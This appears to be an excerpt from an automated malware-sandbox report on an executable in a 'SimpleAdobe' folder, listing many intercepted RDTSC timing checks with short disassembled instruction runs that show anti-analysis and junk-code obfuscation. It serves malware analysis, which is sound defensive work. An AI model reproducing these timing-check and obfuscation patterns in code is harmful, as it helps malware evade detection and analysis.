Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BDF8A1 second address: BDF8A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE08FC second address: BE0902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE0902 second address: BE090C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F0D21AE06h 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE090C second address: BE093E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F7F0D2259C5h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE56DA second address: BE56DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE56DE second address: BE56E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE56E2 second address: BE570D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F7F0D21AE0Fh 0x0000000d push ecx 0x0000000e jmp 00007F7F0D21AE0Eh 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE570D second address: BE5717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F0D2259B6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE5888 second address: BE588E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE66CA second address: BE66D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE66D1 second address: BE66D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE6AFE second address: BE6B08 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7F0D2259B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE779B second address: BE77B0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F0D21AE06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F7F0D21AE06h 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE78BD second address: BE78C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE78C2 second address: BE78D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F7F0D21AE06h 0x00000009 je 00007F7F0D21AE06h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE78D9 second address: BE78E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F7F0D2259B6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE9D3A second address: BE9D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE9D3F second address: BE9D44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE9D44 second address: BE9D4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BE9D4A second address: BE9D56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BEC45D second address: BEC481 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7F0D21AE10h 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BED9B3 second address: BED9B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF02EA second address: BF02F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF02F2 second address: BF02F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF02F8 second address: BF0302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F7F0D21AE06h 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BAB156 second address: BAB15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BAB15A second address: BAB181 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D21AE0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F7F0D21AE14h 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFAABF second address: BFAAC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFAAC4 second address: BFAACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFAACA second address: BFAAD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BECE1D second address: BECE21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF8611 second address: BF861C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7F0D2259B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF861C second address: BF86BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F7F0D21AE08h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov bx, 1508h 0x00000026 ja 00007F7F0D21AE1Ah 0x0000002c push dword ptr fs:[00000000h] 0x00000033 jmp 00007F7F0D21AE19h 0x00000038 jmp 00007F7F0D21AE0Ch 0x0000003d mov dword ptr fs:[00000000h], esp 0x00000044 jg 00007F7F0D21AE0Ch 0x0000004a mov eax, dword ptr [ebp+122D01B5h] 0x00000050 mov bh, 7Ah 0x00000052 push FFFFFFFFh 0x00000054 and edi, dword ptr [ebp+122D373Ah] 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push ebx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BF86BB second address: BF86C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFAAD8 second address: BFAADE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFD202 second address: BFD208 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFD208 second address: BFD20C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BFD20C second address: BFD210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C012ED second address: C012F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F7F0D21AE06h 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C022DC second address: C022FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F7F0D2259C7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C022FB second address: C0238E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F7F0D21AE16h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F7F0D21AE08h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov edi, dword ptr [ebp+122D1905h] 0x0000002d push 00000000h 0x0000002f jmp 00007F7F0D21AE0Fh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F7F0D21AE08h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 00000016h 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 mov di, 6BA3h 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 push edi 0x00000057 jmp 00007F7F0D21AE13h 0x0000005c pop edi 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 0x00000060 pop esi 0x00000061 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C033B8 second address: C033BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C033BC second address: C033C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C033C0 second address: C033F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bl, 75h 0x0000000c push 00000000h 0x0000000e mov di, cx 0x00000011 push 00000000h 0x00000013 or dword ptr [ebp+122D262Fh], ecx 0x00000019 mov edi, dword ptr [ebp+122D2682h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F7F0D2259C7h 0x00000027 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C07BDA second address: C07BE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0F3F5 second address: C0F433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F7F0D2259BEh 0x0000000b jo 00007F7F0D2259BCh 0x00000011 jc 00007F7F0D2259B6h 0x00000017 jmp 00007F7F0D2259C4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jl 00007F7F0D2259B6h 0x00000026 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0F433 second address: C0F437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0EBE9 second address: C0EBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0EBED second address: C0EBF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0ED44 second address: C0ED61 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F0D2259B6h 0x00000008 js 00007F7F0D2259B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F7F0D2259BDh 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0EF11 second address: C0EF2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F7F0D21AE10h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0EF2C second address: C0EF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0EF38 second address: C0EF3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C0EF3C second address: C0EF4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F0D2259BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13DAE second address: C13DB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13E91 second address: C13EB2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F0D2259BFh 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F7F0D2259B6h 0x00000017 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13EB2 second address: C13ECD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F0D21AE0Ch 0x00000014 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13ECD second address: C13ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13ED1 second address: C13ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13F8F second address: C13F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C13F93 second address: C13FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jbe 00007F7F0D21AE06h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 jmp 00007F7F0D21AE0Eh 0x0000001b pop eax 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C140AA second address: C140BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F0D2259BBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BA10C8 second address: BA10CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1CC8F second address: C1CC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: BA2B24 second address: BA2B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1B8C0 second address: C1B8CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1B8CD second address: C1B8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F0D21AE06h 0x0000000a popad 0x0000000b jns 00007F7F0D21AE1Dh 0x00000011 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C09F second address: C1C0A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C0A6 second address: C1C0AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C0AE second address: C1C0B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C0B4 second address: C1C0BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C7F5 second address: C1C7FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C7FB second address: C1C810 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F7F0D21AE08h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C810 second address: C1C81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F0D2259B6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C81A second address: C1C827 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C827 second address: C1C837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jno 00007F7F0D2259B6h 0x0000000c popad 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C1C9D4 second address: C1C9DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C2247D second address: C22481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C22481 second address: C22485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	RDTSC instruction interceptor: First address: C22485 second address: C224AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F0D2259BFh 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F0D2259BDh 0x00000013 rdtsc
